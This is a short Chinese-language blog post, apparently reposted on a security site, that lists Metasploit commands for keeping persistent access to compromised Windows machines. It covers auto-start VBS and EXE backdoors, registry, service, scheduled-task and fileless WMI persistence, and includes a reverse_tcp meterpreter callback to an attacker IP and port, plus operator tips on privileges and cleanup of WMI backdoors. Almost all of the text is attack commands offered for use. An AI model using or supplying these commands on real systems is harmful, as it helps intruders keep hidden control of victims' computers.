Metasploit 常用维权方式

admin 2023年12月15日21:49:49评论10 views字数 1040阅读3分28秒阅读模式

metasploit 后渗透常用的维持权限的方式.

上传 vbs 开机自启 (被弃用).

run persistence -r 192.168.1.100 -p 4444 -i 5 -P windows/x64/meterpreter/reverse_tcp -X

上传 exe 开机自启 (替代 vbs 方式).

run post/windows/manage/persistence_exe REXEPATH=/home/exp10it/msf.exe

添加 powershell 开机自启.

use exploit/windows/local/registry_persistence

可指定 STARTUP, 但注意要在会话是 Administrator 权限的时候运行, System 权限需先降权, 否则无效.

仅支持 x86 payload, 可通过 exploit/windows/local/payload_inject 反弹成 64 位的会话.

use exploit/windows/local/persistence_service

上传 exe 执行, 需要 system 权限.

run scheduleme -e /home/exp10it/msf.exe -H 12

中途会出现 Failed to create scheduled task!!, 但实际上已经添加成功.

通过 powershell 方式执行, 无文件后门, 支持 5 种触发方式.

use exploit/windows/local/wmi_persistence

注意切换触发方式时要先清除以前的后门.

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Updater'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Updater'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Updater%'" | Remove-WmiObject -Verbose

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日21:49:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit 常用维权方式http://cn-sec.com/archives/2306653.html

发表评论

匿名网友 填写信息